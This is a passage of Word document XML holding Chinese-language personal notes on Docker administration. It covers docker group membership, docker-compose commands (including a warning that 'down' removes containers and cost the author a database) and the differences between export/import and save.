    <w:p w14:paraId="05580982" w14:textId="77777777" w:rsidR="007C2713" w:rsidRDefault="007C2713" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Adding user weiyj to group docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D717DD2" w14:textId="77777777" w:rsidR="007C2713" w:rsidRDefault="007C2713" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重启</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F4A09B" w14:textId="77777777" w:rsidR="007C2713" w:rsidRDefault="007C2713" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">vagrant@ubuntu18:~$ </w:t>
      </w:r>
      <w:r w:rsidRPr="007C2713">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sudo service docker restart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C22071" w14:textId="77777777" w:rsidR="007C2713" w:rsidRDefault="007C2713" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>刷新</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>组成员</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1663697E" w14:textId="77777777" w:rsidR="007C2713" w:rsidRDefault="007C2713" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">vagrant@ubuntu18:~$ </w:t>
      </w:r>
      <w:r w:rsidRPr="007C2713">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>newgrp docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED2C376" w14:textId="77777777" w:rsidR="007C2713" w:rsidRDefault="007C2713" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再试试命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>^_^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A18B03" w14:textId="77777777" w:rsidR="007C2713" w:rsidRDefault="007C2713" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">vagrant@ubuntu18:~$ </w:t>
      </w:r>
      <w:r w:rsidRPr="007C2713">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>docker images</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D054D0A" w14:textId="2E5EE9C0" w:rsidR="007772FA" w:rsidRDefault="007C2713" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418E972E" w14:textId="77777777" w:rsidR="007772FA" w:rsidRDefault="007772FA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D31C95B" w14:textId="5D76F3B7" w:rsidR="007772FA" w:rsidRDefault="007C2713" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后当前的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>退了重新开一个，这样你目前的用户就可以操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ocker images </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37708F58" w14:textId="7437F0F7" w:rsidR="009275D8" w:rsidRDefault="009275D8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2124374F" w14:textId="570CD2F4" w:rsidR="009275D8" w:rsidRDefault="00816111" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="115" w:name="_Toc159779576"/>
      <w:r>
        <w:t>docker-compose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="115"/>
    </w:p>
    <w:p w14:paraId="05DC6976" w14:textId="77777777" w:rsidR="00816111" w:rsidRDefault="00816111" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="223D4CE7" w14:textId="12219A3A" w:rsidR="00816111" w:rsidRDefault="00FB29B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方便调试的</w:t>
      </w:r>
      <w:r w:rsidR="0094420A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>技巧</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5047F84D" w14:textId="6B3B722C" w:rsidR="00FB29B1" w:rsidRPr="00816111" w:rsidRDefault="00FB29B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t>ocker-compose down &amp;&amp; docker-compose rebuild &amp;&amp; docker-compose up -d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA96344" w14:textId="77777777" w:rsidR="00816111" w:rsidRDefault="00816111" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31E3D9BA" w14:textId="77777777" w:rsidR="00816111" w:rsidRDefault="00816111" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="624A639B" w14:textId="34A3B020" w:rsidR="009275D8" w:rsidRDefault="009275D8" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="116" w:name="_Toc159779577"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t>ocker-compose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作</w:t>
      </w:r>
      <w:bookmarkEnd w:id="116"/>
    </w:p>
    <w:p w14:paraId="476DB96C" w14:textId="6B54E15B" w:rsidR="009275D8" w:rsidRDefault="009275D8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BD143BA" w14:textId="2727A607" w:rsidR="009275D8" w:rsidRDefault="009275D8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ocker-compose build </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构建镜像，镜像文件会存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t>ocker images</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37190F85" w14:textId="689BD940" w:rsidR="009275D8" w:rsidRDefault="009275D8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ocker-compose up -d </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动容器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEA52AD" w14:textId="2B1C12D2" w:rsidR="009275D8" w:rsidRDefault="009275D8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="009275D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r w:rsidRPr="009275D8">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">-compose down </w:t>
      </w:r>
      <w:r w:rsidRPr="009275D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>移除容器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="009275D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>这点我以前以为</w:t>
      </w:r>
      <w:r w:rsidRPr="009275D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="009275D8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>own</w:t>
      </w:r>
      <w:r w:rsidRPr="009275D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>是类似于</w:t>
      </w:r>
      <w:r w:rsidRPr="009275D8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">docker </w:t>
      </w:r>
      <w:r w:rsidRPr="009275D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>stop</w:t>
      </w:r>
      <w:r w:rsidRPr="009275D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>的命令，没想到</w:t>
      </w:r>
      <w:r w:rsidRPr="009275D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="009275D8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>ocker-compose down</w:t>
      </w:r>
      <w:r w:rsidRPr="009275D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>是移除的意思，导致删库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D567561" w14:textId="117777B1" w:rsidR="009275D8" w:rsidRDefault="0083744B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ocker-compose stop </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>暂停容器运行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1F9AD3" w14:textId="60835476" w:rsidR="009275D8" w:rsidRDefault="009275D8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="294C1B78" w14:textId="77777777" w:rsidR="009275D8" w:rsidRDefault="009275D8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="645F1189" w14:textId="77777777" w:rsidR="009275D8" w:rsidRDefault="009275D8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06059600" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="117" w:name="_Toc159779578"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导出导入操作</w:t>
      </w:r>
      <w:bookmarkEnd w:id="117"/>
    </w:p>
    <w:p w14:paraId="1F58232B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:https://www.hangge.com/blog/cache/detail_2411.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1349DFB2" w14:textId="3918B439" w:rsidR="004C452C" w:rsidRDefault="00C3773A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C3773A">
        <w:t>https://www.cnblogs.com/deali/p/17469841.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071C6651" w14:textId="77777777" w:rsidR="00C3773A" w:rsidRDefault="00C3773A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A063E6B" w14:textId="77777777" w:rsidR="00C3773A" w:rsidRDefault="00C3773A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1417768D" w14:textId="575A38DF" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不过需要注意一下，导入导出的时候最好根据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>`docker ps -a`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>名字来操作，不要根据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来操作。否则导入的时候，显示的名字可能是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;none&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。这个时候虽然容器可以正常运行，但是很多人会感觉</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;none&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是错误的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B44997B" w14:textId="51C0CEB0" w:rsidR="00696999" w:rsidRDefault="00696999" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CC608F5" w14:textId="045282BD" w:rsidR="00696999" w:rsidRDefault="00696999" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C6E3724" w14:textId="1B0147AA" w:rsidR="00696999" w:rsidRDefault="00CD366C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E09A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>最重要的注意，</w:t>
      </w:r>
      <w:r w:rsidRPr="002E09A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r w:rsidRPr="002E09A2">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-compose</w:t>
      </w:r>
      <w:r w:rsidRPr="002E09A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>无法构建容器为镜像，而且也不会复制外部目录到内部，有的仅仅是</w:t>
      </w:r>
      <w:r w:rsidRPr="002E09A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>volumns</w:t>
      </w:r>
      <w:r w:rsidRPr="002E09A2">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>: xxx:xxx</w:t>
      </w:r>
      <w:r w:rsidRPr="002E09A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的挂载。</w:t>
      </w:r>
      <w:r w:rsidR="001417E2" w:rsidRPr="002E09A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>如果容器是使用的挂载目录，而不是复制进去的文件，那么会无法运行相应目录中的文件和程序。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B26FA7C" w14:textId="13329E97" w:rsidR="00F95C3C" w:rsidRPr="002E09A2" w:rsidRDefault="00F95C3C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>所以我建议，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Dockerfile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>dockerf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>-compose.yml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>结合使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DA1CA0" w14:textId="0B88FBB2" w:rsidR="00696999" w:rsidRDefault="00696999" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="212C9FC7" w14:textId="77777777" w:rsidR="00696999" w:rsidRDefault="00696999" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="632BAC41" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="118" w:name="_Toc159779579"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>容器：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>export</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:bookmarkEnd w:id="118"/>
    </w:p>
    <w:p w14:paraId="1D7C19D3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CF76FD2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker export f299f501774c &gt; hangger_server.tar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B899FA8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker import - new_hangger_server &lt; hangger_server.tar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCEF71D" w14:textId="77777777" w:rsidR="00C3773A" w:rsidRDefault="00C3773A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21BC6BFB" w14:textId="77777777" w:rsidR="00C3773A" w:rsidRDefault="00C3773A" w:rsidP="00C3773A">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件大小不同</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3773A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3773A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">export </w:t>
      </w:r>
      <w:r w:rsidRPr="00C3773A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>导出的镜像文件体积小于</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3773A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> save </w:t>
      </w:r>
      <w:r w:rsidRPr="00C3773A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>保存的镜像</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> save </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会把所有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> layer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>都导出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54874EAE" w14:textId="77777777" w:rsidR="00C3773A" w:rsidRDefault="00C3773A" w:rsidP="00C3773A">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">save </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以把多个镜像打包到一个文件，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">export </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不可以</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2A425A" w14:textId="65E24286" w:rsidR="00C3773A" w:rsidRDefault="00C3773A" w:rsidP="00C3773A">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C3773A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">export </w:t>
      </w:r>
      <w:r w:rsidRPr="00C3773A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>导出（</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3773A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r w:rsidRPr="00C3773A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>导入）是根据容器拿到的镜像</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，再导入时会丢失镜像所有的历史记录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
